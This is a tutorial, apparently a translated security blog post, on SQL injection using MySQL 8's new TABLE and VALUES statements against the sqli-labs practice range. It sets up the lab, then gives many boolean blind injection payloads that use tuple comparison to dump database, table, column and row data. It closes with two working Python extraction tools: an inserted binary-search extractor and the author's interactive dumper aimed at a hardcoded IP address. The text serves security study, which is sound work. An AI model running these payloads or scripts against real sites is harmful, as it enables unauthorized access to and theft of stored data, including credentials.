MySQL8 table injection

A quick recap of SQL injection using the syntax that is new in MySQL 8 (the TABLE and VALUES statements).
0x01 MySQL8

MySQL 8.0.20 ships in the Ubuntu 20.04 APT repositories. According to Oracle, MySQL 8 is up to twice as fast as MySQL 5.7; it adds a JSON type and a NoSQL document store, changes the default authentication plugin (caching_sha2_password instead of the mysql_native_password used by 5.x) and brings a number of other improvements.
0x02 Environment

1. The simplest way to build a MySQL 8 environment is to pull the Docker image:

docker pull mysql:8.0.21
docker run -d --name=mysql8 -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 mysql:8.0.21

2. Download the vulstudy integrated environment (github.com/c0ny1/vulst…) and start its sqli-labs container.

3. Inside the sqli-labs container, install vim (switching the APT mirror first) and edit the sqli-labs database credentials so they point at the mysql8 container:

sed -i s@/deb.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources
apt-get update && apt-get install vim
vim /app/sql-connections/db-creds.inc

4. Then, in the mysql8 container, run the following SQL to switch root to the old authentication plugin (the default plugin in MySQL 8.0 is different from 5.x):

ALTER USER 'root' IDENTIFIED WITH mysql_native_password BY '123456';

5. Reset the database from the sqli-labs setup page. The environment is ready.
0x03 New syntax

Since MySQL 8.0.19, MySQL has introduced several new syntax features.

1. TABLE statement

Function: lists the entire contents of a table.

TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

TABLE is similar to SELECT: it supports UNION, ORDER BY, and a LIMIT clause to restrict the number of rows returned. Example, after switching to the sqli-labs database:

use security;
mysql> TABLE users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.01 sec)

ORDER BY and LIMIT can be added:

table users order by password;
table users limit 1;
table users limit 0,1;
table users limit 1,1;
TABLE differs from SELECT in two ways:

1. TABLE always displays all columns of the table (like SELECT * FROM).

2. TABLE does not allow arbitrary filtering of rows, that is, TABLE does not support any WHERE clause.
2. VALUES statement

Function: lists one or more rows of values.

VALUES row_constructor_list [ORDER BY column_designator] [LIMIT number]

row_constructor_list:
    ROW(value_list)[, ROW(value_list)][, ...]

value_list:
    value[, value][, ...]

column_designator:
    column_index

VALUES displays a group of one or more rows as a table and returns table data. ROW() returns a single row; VALUES collects the rows produced by ROW() into a table, whose columns are named column_0, column_1 and so on. Example:
mysql> TABLE emails;
+----+------------------+
| id | email_id         |
+----+------------------+
|  1 | [email protected] |
|  2 | [email protected] |
|  3 | [email protected] |
|  4 | [email protected] |
|  5 | [email protected] |
|  6 | [email protected] |
|  7 | [email protected] |
|  8 | [email protected] |
+----+------------------+
8 rows in set (0.00 sec)

(The addresses were obfuscated in the capture of this page.)

mysql> VALUES ROW(1, 2, 3) UNION SELECT * FROM users;
+----------+----------+------------+
| column_0 | column_1 | column_2   |
+----------+----------+------------+
| 1        | 2        | 3          |
| 1        | Dumb     | Dumb       |
| 2        | Angelina | I-kill-you |
| 3        | Dummy    | p@ssword   |
| 4        | secure   | crappy     |
| 5        | stupid   | stupidity  |
| 6        | superman | genious    |
| 7        | batman   | mob!le     |
| 8        | admin    | admin      |
| 9        | admin1   | admin1     |
| 10       | admin2   | admin2     |
| 11       | admin3   | admin3     |
| 12       | dhakkan  | dumbo      |
| 14       | admin4   | admin4     |
+----------+----------+------------+
14 rows in set (0.00 sec)
0x04 Injection

1. In the MySQL command terminal
(1) The TABLE and VALUES statements both return table data, so they can be combined with UNION. If the column counts do not match, an error is raised:

TABLE users UNION VALUES ROW(1,2,3);
SELECT * FROM users WHERE id=-1 UNION VALUES ROW(1,2,3);

(2) List all database names:

TABLE information_schema.schemata;

(3) Blind extraction by comparing tuples. Query a single row:
mysql> table users limit 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

The result is in effect the tuple (1,'Dumb','Dumb'), so it can be compared against a row constructor of the form (id, username, password). Row constructors are compared element by element from left to right: if the first elements are equal, the second elements decide, and so on. Strings are compared the same way character by character: the first character that differs decides the order, and a string that is a prefix of the other sorts first. The comparison of the two tuples therefore yields true or false, which is exactly what a boolean blind injection needs.
mysql> select ((1,'','')<(table users limit 1));        -- 1
mysql> select ((2,'','')<(table users limit 1));        -- 0
mysql> select ((1,'Du','')<(table users limit 1));      -- 1
mysql> select ((1,'Dum','')<(table users limit 1));     -- 1
mysql> select ((1,'Dumb','')<(table users limit 1));    -- 1
mysql> select ((1,'Dumb','D')<(table users limit 1));   -- 1

Points to note:

1. In the guess tuple, the element immediately after the column being guessed must be a string (the '' placeholder), not a numeric filler, otherwise the last character of the current column cannot be detected.

2. It is better to use <= than <. < works while guessing the leading characters, but with <= the guess that is exactly the right value still compares true, and the first guess whose last character is one too large compares false, which makes the stopping point clearer.
The final check is therefore:

mysql> select ((1,'Dumb','Dumb')<=(table users limit 1));   -- 1
mysql> select ((1,'Dumb','Dumc')<=(table users limit 1));   -- 0

2. Testing on the sqli-labs range (less-1)

(1) Determine the number of columns with the classic ORDER BY:
1' order by 3--+    # normal
1' order by 4--+    # Unknown column '4' in 'order clause'

(2) UNION with VALUES in place of SELECT:

-1' union values row(1,2,3)--+

(3) Dumping the database, tables, columns and data

a) Current database:

-1' union values row(1,database(),3)--+
1' and ascii(substr((database()),1,1))=115--+    # 's'

b) All databases. TABLE cannot choose its column count the way SELECT can, so a UNION with TABLE only displays when the column count happens to match the table; instead we use the tuple comparison. information_schema.schemata has 6 columns, and its first column (CATALOG_NAME) is always 'def':
1' and ('def','m','',4,5,6)<=(table information_schema.schemata limit 1)--+      # normal
1' and ('def','n','',4,5,6)<=(table information_schema.schemata limit 1)--+      # error -> m...
...
1' and ('def','mysql','',4,5,6)<=(table information_schema.schemata limit 1)--+  # normal
1' and ('def','mysqm','',4,5,6)<=(table information_schema.schemata limit 1)--+  # error -> the first database is mysql

1' and ('def','information_schema','',4,5,6)<=(table information_schema.schemata limit 1,1)--+   # normal
1' and ('def','information_schemb','',4,5,6)<=(table information_schema.schemata limit 1,1)--+   # error -> the second database is information_schema
...

c) Tables. information_schema.tables has 21 columns:
1' and ('def','security','users','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 317,1)--+      # users
1' and ('def','security','emails','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 318,1)--+     # emails, the second table
1' and ('def','security','uagents','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 319,1)--+    # uagents
1' and ('def','security','referers','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 320,1)--+   # referers

d) Columns. information_schema.columns has 22 columns:
1' and ('def','security','users','id','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit 3306,1)--+        # id
1' and ('def','security','users','password','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit 387,1)--+   # password
1' and ('def','security','users','username','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit …,1)--+     # username (row number missing from the capture)
e) Data:

1' and (1,'D','')<=(table users limit 1)--+          # normal
1' and (1,'E','')<=(table users limit 1)--+          # error
...
1' and (1,'Dumb','Dumb')<=(table users limit 1)--+   # normal -> 1 Dumb Dumb

(table users limit 1 and table users limit 0,1 address the same row.)

1' and (8,'admin','admin')<=(table users limit 7,1)--+   # normal
1' and (8,'admin','admio')<=(table users limit 7,1)--+   # error -> the 8th row is 8 admin admin

Step through the rows in the same way to dump the data.
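The tuple-comparison method shown in the MySQL terminal section and applied by hand on the sqli-labs range above generalises to a small extractor, which is given here as an added example (it is not the author's script and not part of the original page). It assumes that string guesses are sent as hex literals (0x...), so that MySQL compares them with the real column as binary strings in byte order rather than in the table's collation, and that the values being recovered are printable ASCII. Because the predicate "prefix+c compares <= the row" is then monotone in the byte value of c, each character can be found by binary search over the 95 printable characters instead of trying them one by one, and the case where no candidate compares true is the end-of-string test. The sample rows are constructed to mirror the page's tables; the simulated oracle emulates MySQL's row-constructor comparison so the code runs offline.

```python
from typing import Callable, Optional, Sequence, Tuple, Union

Value = Union[int, str]
Row = Tuple[Optional[Value], ...]
# oracle(guess_tuple, row_index) answers: does (guess_tuple) <= (that row of the target table) hold?
Oracle = Callable[[Tuple[Value, ...], int], bool]

PRINTABLE = [chr(b) for b in range(0x20, 0x7F)]  # ascending byte order == binary string order


def make_guess(known: Sequence[Value], guess: str, ncols: int) -> Tuple[Value, ...]:
    """Row constructor compared against the target row: the known leading columns, the
    column being recovered, an '' placeholder for the next column (a complete guess must
    still compare <= the row, and '' sorts below any non-empty string), then numeric
    fillers so the constructor has the table's column count (4,5,6 for schemata)."""
    col = len(known)
    placeholder: Tuple[Value, ...] = ("",) if col + 1 < ncols else ()
    return tuple(known) + (guess,) + placeholder + tuple(range(col + 3, ncols + 1))


def build_payload(table: str, guess: Sequence[Value], row: int) -> str:
    """Render a sqli-labs style boolean payload; non-empty strings go out as hex literals."""
    def sql(v: Value) -> str:
        if isinstance(v, int):
            return str(v)
        return "0x" + v.encode().hex() if v else "''"
    return "1' and (%s)<=(table %s limit %d,1)--+" % (",".join(sql(v) for v in guess), table, row)


def extract_value(oracle: Oracle, row: int, known: Sequence[Value], ncols: int, max_len: int = 64) -> str:
    """Recover column number len(known) of `row`, one character per round.  For a prefix P,
    oracle(P + c) is true exactly when byte(c) <= the real next byte, so the candidates are
    binary-searched (about 7 requests per character).  When no candidate compares true,
    P is already the whole value."""
    prefix = ""
    for _ in range(max_len):
        lo, hi = 0, len(PRINTABLE)  # lo ends as the number of candidates that compare true
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(make_guess(known, prefix + PRINTABLE[mid], ncols), row):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # even ' ' is too big: the value is complete
            return prefix
        if lo == len(PRINTABLE) and oracle(make_guess(known, prefix + "\x7f", ncols), row):
            raise ValueError("byte after %r is outside printable ASCII" % prefix)
        prefix += PRINTABLE[lo - 1]
    raise ValueError("value longer than max_len")


def dump_row(oracle: Oracle, row: int, row_id: int, ncols: int = 3) -> Tuple[Value, ...]:
    """Recover every string column of a users-style row, taking the numeric id as known."""
    known: Tuple[Value, ...] = (row_id,)
    while len(known) < ncols:
        known = known + (extract_value(oracle, row, known, ncols),)
    return known


# ---- offline stand-in for the injected page: emulates MySQL row-constructor comparison ----
def _num(v: Value) -> float:
    try:
        return float(v)
    except ValueError:  # MySQL casts a non-numeric string to 0 in a numeric comparison
        return 0.0


def mysql_le(a: Sequence[Optional[Value]], b: Sequence[Optional[Value]]) -> bool:
    """(a1,a2,...) <= (b1,b2,...) as MySQL evaluates it: left to right, the first unequal
    pair decides; str vs str is byte-wise here (the hex-literal case); str vs number is
    numeric; a NULL on either side makes the result unknown, i.e. not true."""
    for x, y in zip(a, b):
        if x is None or y is None:
            return False
        if isinstance(x, str) and isinstance(y, str):
            if x.encode() != y.encode():
                return x.encode() < y.encode()
        elif _num(x) != _num(y):
            return _num(x) < _num(y)
    return True  # all elements equal


def simulated_oracle(rows: Sequence[Row]) -> Oracle:
    return lambda guess, row: mysql_le(guess, rows[row])


# Constructed sample data mirroring the page's tables (not captured from a server).
USERS: Sequence[Row] = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]
SCHEMATA: Sequence[Row] = [
    ("def", "mysql", "utf8mb4", "utf8mb4_0900_ai_ci", None, "NO"),
    ("def", "information_schema", "utf8mb4", "utf8mb4_0900_ai_ci", None, "NO"),
]

if __name__ == "__main__":
    print(build_payload("information_schema.schemata", make_guess(("def",), "mysql", 6), 0))
    print([extract_value(simulated_oracle(SCHEMATA), r, ("def",), 6) for r in range(len(SCHEMATA))])
    print([dump_row(simulated_oracle(USERS), r, rid) for r, (rid, _, _) in enumerate(USERS)])
```

Against a live sqli-labs page the oracle would be a function that sends build_payload(table, guess, row) and tests the response for "You are in" (a hypothetical `lambda guess, row: "You are in" in requests.get(url + build_payload(table, guess, row)).text`, not run here). Two caveats: if the guess is sent as a quoted string instead of a hex literal, the comparison uses the column's collation, and under MySQL 8's default utf8mb4_0900_ai_ci (case- and accent-insensitive) byte order no longer matches sort order, so the binary search must be replaced by a sequential scan in collation order; and if the column following the one being guessed is NULL, the '' placeholder compares unknown, which is why the last character of such a column cannot be confirmed.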
0x05 Script

Probing one character at a time by hand is cumbersome, so I tried to write a script:
"""
@author qwzf
@desc   SQL injection using the MySQL 8 TABLE statement
@date   2021/02/18
"""
import requests
import string

url = "http://121.41.231.75:8002/Less-8/?id="
chars = string.ascii_letters + string.digits + "@{}_-?"


def page_true(url, payload):
    # Less-8 is a boolean blind: the page prints "You are in" when the injected condition holds
    return "You are in" in requests.get(url=url + payload).text


def current_db(url):
    print("Use the MySQL 8 feature (1) or ordinary boolean blind injection (2): ", end="")
    num = int(input())
    if num == 1:
        payload = "-1' union values row(1,database(),3)--+"
        print(requests.get(url=url + payload).text)
    else:
        payload = "1' and ascii(substr((database()),{0},1))={1}--+"
        name = ""
        for i in range(1, 20):
            char = ""
            for j in chars:
                if page_true(url, payload.format(i, ord(j))):
                    name += j
                    print(name)
                    char = j
                    break
            if char == "":      # no character matched: end of the name
                break


def str2hex(name):
    # 'abc' -> '0x616263': a hex literal needs no quotes in the payload and is compared as a binary string
    res = ""
    for i in name:
        res += hex(ord(i))
    return "0x" + res.replace("0x", "")


def brute(url, payload):
    # Recover one string value character by character. payload has a {} slot for the hex guess and
    # compares the guess tuple with > against the target row: the first candidate c for which
    # prefix+c > value is one past the real character, so the real one is chr(c-1). Once the prefix
    # is the complete value, already the first candidate (space) is greater, which ends the search.
    name = ""
    for _ in range(1, 20):
        for char in range(32, 127):
            if page_true(url, payload.format(str2hex(name + chr(char)))):
                if char == 32:
                    return name
                name += chr(char - 1)
                print(name)
                break
        else:
            break               # no candidate was greater: next character is outside 32..126
    return name


def fillers(start, end):
    # numeric padding so the row constructor has as many elements as the information_schema table
    return ",".join(str(i) for i in range(start, end + 1))


def dbs(url):
    # database names from information_schema.schemata (6 columns, the first is always 'def')
    while True:
        print("Which database (1, 2, ...; 0 to go back): ", end="")
        x = int(input()) - 1
        if x < 0:
            break
        brute(url, "1' and ('def',{},'',4,5,6)>(table information_schema.schemata limit %d,1)--+" % x)


def tables_n(url, database):
    # Find the first row of information_schema.tables (21 columns) that belongs to `database`:
    # the first row greater than ('def', database, '', '', ...) that is not also greater than the
    # same tuple with the last letter of the database name bumped by one, i.e. table_schema == database.
    def payload(db, i):
        return "1' and ('def','%s','','',%s)<(table information_schema.tables limit %d,1)--+" % (db, fillers(5, 21), i)
    bumped = database[:-1] + chr(ord(database[-1]) + 1)
    for i in range(0, 10000):
        if page_true(url, payload(database, i)) and not page_true(url, payload(bumped, i)):
            print("the tables of %s start at row %d" % (database, i))
            return i
    return None


def tables(url, database, n):
    while True:
        print("Which table (1, 2, ...; 0 to go back): ", end="")
        x = int(input()) - 1
        if x < 0:
            break
        brute(url, "1' and ('def','%s',{},'',%s)>(table information_schema.tables limit %d,1)--+"
                   % (database, fillers(5, 21), x + n))


def columns_n(url, database, table):
    # same as tables_n, over information_schema.columns (22 columns); the search starts at row 3000,
    # where the columns of the user tables appeared in this instance
    def payload(tb, i):
        return "1' and ('def','%s','%s','',%s)<(table information_schema.columns limit %d,1)--+" % (database, tb, fillers(5, 22), i)
    bumped = table[:-1] + chr(ord(table[-1]) + 1)
    for i in range(3000, 10000):
        if page_true(url, payload(table, i)) and not page_true(url, payload(bumped, i)):
            print("the columns of %s.%s start at row %d" % (database, table, i))
            return i
    return None


def columns(url, database, table, n):
    while True:
        print("Which column (1, 2, ...; 0 to go back): ", end="")
        x = int(input()) - 1
        if x < 0:
            break
        brute(url, "1' and ('def','%s','%s',{},'',%s)>(table information_schema.columns limit %d,1)--+"
                   % (database, table, fillers(6, 22), x + n))


def datas(url, table):
    # assumes a users-style table (id, username, password) whose rows are ordered by id starting
    # at 1; recovers the second column of the row whose id is entered
    while True:
        print("Which id (1, 2, ...; 0 to go back): ", end="")
        x = int(input())
        if x < 1:
            break
        brute(url, "1' and (%d,{},'')>(table %s limit %d,1)--+" % (x, table, x - 1))


if __name__ == "__main__":
    while True:
        print("Please choose an operation:\n1. dump current database\n2. find the start row of the tables\n"
              "3. dump table names\n4. find the start row of the columns\n5. dump column names\n"
              "6. dump data\nother: dump all database names")
        types = int(input())
        if types == 1:
            current_db(url)
        elif types == 2 or types == 3:
            print("Database name: ", end="")
            database = input()
            if types == 2:
                tables_n(url, database)
            else:
                print("Start row: ", end="")
                n = int(input())
                tables(url, database, n)
        elif types == 4 or types == 5:
            print("Database name: ", end="")
            database = input()
            print("Table name: ", end="")
            table = input()
            if types == 4:
                columns_n(url, database, table)
            else:
                print("Start row: ", end="")
                n = int(input())
                columns(url, database, table, n)
        elif types == 6:
            print("Table name: ", end="")
            table = input()
            datas(url, table)
        else:
            dbs(url)